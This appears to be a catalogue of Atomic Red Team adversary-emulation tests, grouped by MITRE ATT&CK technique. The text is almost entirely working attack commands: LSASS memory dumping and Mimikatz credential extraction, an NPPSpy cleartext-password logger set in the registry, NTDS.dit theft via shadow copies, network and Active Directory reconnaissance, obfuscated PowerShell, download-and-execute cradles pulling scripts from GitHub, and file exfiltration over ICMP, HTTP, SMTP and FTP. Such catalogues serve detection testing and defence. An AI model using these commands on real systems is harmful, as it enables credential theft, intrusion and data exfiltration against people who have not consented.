T1003 OS Credential Dumping · 7 tests
command_promptelevatedwindowsGsecdump
"#{gsecdump_exe}" -a
powershellelevatedwindowsCredential Dumping with NPPSpy
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
powershellelevatedwindowsDump svchost.exe to gather RDP credentials
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
powershellwindowsDump Credential Manager using keymgr.dll and rundll32.exe
rundll32.exe keymgr,KRShowKeyMgr
powershellwindowsSend NTLM Hash with RPC Test Connection
rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
T1003.001 LSASS Memory · 14 tests
command_promptelevatedwindowsDump LSASS.exe Memory using ProcDump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
powershellelevatedwindowsDump LSASS.exe Memory using comsvcs.dll
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
command_promptelevatedwindowsDump LSASS.exe Memory using direct system calls and API unhooking
"#{dumpert_exe}"
command_promptelevatedwindowsDump LSASS.exe Memory using NanoDump
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
manualwindowsDump LSASS.exe Memory using Windows Task Manager
command_promptelevatedwindowsOffline Credential Theft With Mimikatz
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
command_promptelevatedwindowsLSASS read with pypykatz
"#{venv_path}\Scripts\pypykatz" live lsa
powershellelevatedwindowsDump LSASS.exe Memory using Out-Minidump.ps1
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
command_promptelevatedwindowsCreate Mini Dump of LSASS.exe using ProcDump
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
powershellelevatedwindowsPowershell Mimikatz
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
powershellelevatedwindowsDump LSASS with createdump.exe from .Net v5
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
powershellelevatedwindowsDump LSASS.exe using imported Microsoft DLLs
#{xordump_exe} -out #{output_file} -x 0x41
powershellelevatedwindowsDump LSASS.exe using lolbin rdrleakdiag.exe
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
command_promptelevatedwindowsDump LSASS.exe Memory through Silent Process Exit
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
T1003.003 NTDS · 11 tests
command_promptelevatedwindowsCreate Volume Shadow Copy with vssadmin
vssadmin.exe create shadow /for=#{drive_letter}
command_promptelevatedwindowsCopy NTDS.dit from Volume Shadow Copy
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
command_promptelevatedwindowsDump Active Directory Database with NTDSUtil
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
command_promptelevatedwindowsCreate Volume Shadow Copy with WMI
wmic shadowcopy call create Volume=#{drive_letter}
command_promptelevatedwindowsCreate Volume Shadow Copy remotely with WMI
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
command_promptelevatedwindowsCreate Volume Shadow Copy remotely (WMI) with esentutl
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
powershellelevatedwindowsCreate Volume Shadow Copy with Powershell
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
command_promptelevatedwindowsCreate Symlink to Volume Shadow Copy
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
command_promptelevatedwindowsCreate Volume Shadow Copy with diskshadow
mkdir c:\exfil
diskshadow.exe /s #{filename}
powershellelevatedwindowsCopy NTDS in low level NTFS acquisition via MFT parsing
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
powershellelevatedwindowsCopy NTDS in low level NTFS acquisition via fsutil
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
T1018 Remote System Discovery · 22 tests
command_promptwindowsRemote System Discovery - net
net view /domain
net view
command_promptwindowsRemote System Discovery - net group Domain Computers
net group "Domain Computers" /domain
command_promptwindowsRemote System Discovery - nltest
nltest.exe /dclist:#{target_domain}
command_promptwindowsRemote System Discovery - ping sweep
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
command_promptwindowsRemote System Discovery - arp
arp -a
shlinux, macosRemote System Discovery - arp nix
arp -a | grep -v '^?'
shlinux, macosRemote System Discovery - sweep
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
powershellelevatedwindowsRemote System Discovery - nslookup
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
command_promptelevatedwindowsRemote System Discovery - adidnsdump
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
command_promptwindowsAdfind - Enumerate Active Directory Computer Objects
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
command_promptwindowsAdfind - Enumerate Active Directory Domain Controller Objects
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
shlinuxRemote System Discovery - ip neighbour
ip neighbour show
shlinuxRemote System Discovery - ip route
ip route show
shlinuxRemote System Discovery - netstat
netstat -r | grep default
shlinuxRemote System Discovery - ip tcp_metrics
ip tcp_metrics show |grep --invert-match "^127\."
powershellwindowsEnumerate domain computers within Active Directory using DirectorySearcher
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
$Computer = $Computer.Properties.name
if (!$Computer) { Continue }
Write-Host $Computer}
powershellwindowsEnumerate Active Directory Computers with Get-AdComputer
Get-AdComputer -Filter *
powershellwindowsEnumerate Active Directory Computers with ADSISearcher
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
powershellwindowsGet-DomainController with PowerView
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
powershellwindowsGet-WmiObject to Enumerate Domain Controllers
try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }
command_promptwindowsRemote System Discovery - net group Domain Controller
net group /domain "Domain controllers"
powershellwindowsEnumerate Remote Hosts with Netscan
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
T1027 Obfuscated Files or Information · 11 tests
shmacos, linuxDecode base64 Data into Script
if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
powershellwindowsExecute base64-encoded PowerShell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
powershellwindowsExecute base64-encoded PowerShell from Windows Registry
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
command_promptwindowsExecution from Compressed File
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"
powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over email
Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}
powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over HTTP
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"
powershellwindowsObfuscated Command in PowerShell
$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
manualwindowsObfuscated Command Line using special Unicode characters
powershellelevatedwindowsSnake Malware Encrypted crmlog file
$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"
command_promptwindowsExecution from Compressed JScript File
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"
powershellwindowsObfuscated PowerShell Command via Character Array
$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)
T1033 System Owner/User Discovery · 7 tests
command_promptwindowsSystem Owner/User Discovery
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
shlinux, macosSystem Owner/User Discovery
users
w
who
powershellwindowsFind computers where user has session - Stealth mode (PowerView)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
powershellwindowsUser Discovery With Env Vars PowerShell Script
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
powershellwindowsGetCurrent User with PowerShell Script
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
powershellwindowsSystem Discovery - SocGholish whoami
$TokenSet = @{
U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"
whoami.exe /all >> #{output_path}\$file
command_promptwindowsSystem Owner/User Discovery Using Command Prompt
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
T1046 Network Service Discovery · 12 tests
bashlinux, macosPort Scan
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
shelevatedlinux, macosPort Scan Nmap
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
powershellelevatedwindowsPort Scan NMap for Windows
nmap #{host_to_scan}
powershellwindowsPort Scan using python
python "#{filename}" -i #{host_ip}
powershellwindowsWinPwn - spoolvulnscan
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
powershellwindowsWinPwn - MS17-10
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
powershellwindowsWinPwn - bluekeep
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
powershellwindowsWinPwn - fruit
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
shcontainersNetwork Service Discovery for Containers
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
powershellwindowsPort-Scanning /24 Subnet with PowerShell
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
powershellelevatedwindowsRemote Desktop Services Discovery via PowerShell
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
shelevatedlinux, macosPort Scan using nmap (Port range)
nmap -Pn -sV -p #{port_range} #{host}
T1047 Windows Management Instrumentation · 10 tests
command_promptwindowsWMI Reconnaissance Users
wmic useraccount get /ALL /format:csv
command_promptwindowsWMI Reconnaissance Processes
wmic process get caption,executablepath,commandline /format:csv
command_promptwindowsWMI Reconnaissance Software
wmic qfe get description,installedOn /format:csv
command_promptwindowsWMI Reconnaissance List Remote Services
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
command_promptwindowsWMI Execute Local Process
wmic process call create #{process_to_execute}
command_promptwindowsWMI Execute Remote Process
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
command_promptwindowsCreate a Process using WMI Query and an Encoded Command
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
powershellelevatedwindowsCreate a Process using obfuscated Win32_Process
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
command_promptwindowsWMI Execute rundll32
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
command_promptelevatedwindowsApplication uninstall using WMIC
wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol · 8 tests
manualmacos, linuxExfiltration Over Alternative Protocol - HTTP
powershellwindowsExfiltration Over Alternative Protocol - ICMP
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
manuallinuxExfiltration Over Alternative Protocol - DNS
powershellwindowsExfiltration Over Alternative Protocol - HTTP
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
powershellwindowsExfiltration Over Alternative Protocol - SMTP
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
powershellwindowsMAZE FTP Upload
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
powershellelevatedwindowsExfiltration Over Alternative Protocol - FTP - Rclone
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
shlinuxPython3 http.server
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
T1049 System Network Connections Discovery · 7 tests
command_promptwindowsSystem Network Connections Discovery
netstat -ano
net use
net sessions 2>nul
powershellwindowsSystem Network Connections Discovery with PowerShell
Get-NetTCPConnection
powershellwindowsSystem Network Connections Discovery via PowerShell (Process Mapping)
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
bashlinux, macosSystem Network Connections Discovery via ss or lsof (Linux/MacOS)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
shlinux, macosSystem Network Connections Discovery FreeBSD, Linux & MacOS
netstat
who -a
shlinuxSystem Network Connections Discovery via sockstat (Linux, FreeBSD)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
powershellelevatedwindowsSystem Discovery using SharpView
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1057 Process Discovery · 9 tests
shlinux, macosProcess Discovery - ps
ps >> #{output_file}
ps aux >> #{output_file}
command_promptwindowsProcess Discovery - tasklist
tasklist
powershellwindowsProcess Discovery - Get-Process
Get-Process
powershellwindowsProcess Discovery - get-wmiObject
get-wmiObject -class Win32_Process
command_promptwindowsProcess Discovery - wmic process
wmic process get /format:list
command_promptwindowsDiscover Specific Process - tasklist
tasklist | findstr #{process_to_enumerate}
powershellelevatedwindowsProcess Discovery - Process Hacker
Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"
powershellelevatedwindowsProcess Discovery - PC Hunter
Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"
command_promptwindowsLaunch Taskmgr from cmd to View running processes
taskmgr.exe /7
T1059.001 PowerShell · 22 tests
command_promptelevatedwindowsMimikatz
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
powershellwindowsRun BloodHound from local disk
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
powershellwindowsRun Bloodhound from Memory using Download Cradle
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
powershellelevatedwindowsMimikatz - Cradlecraft PsSendKeys
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
command_promptwindowsInvoke-AppPathBypass
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
command_promptwindowsPowershell MsXml COM object - with prompt
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
command_promptwindowsPowershell XML requests
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
command_promptwindowsPowershell invoke mshta.exe download
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
manualwindowsPowershell Invoke-DownloadCradle
powershellwindowsPowerShell Fileless Script Execution
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
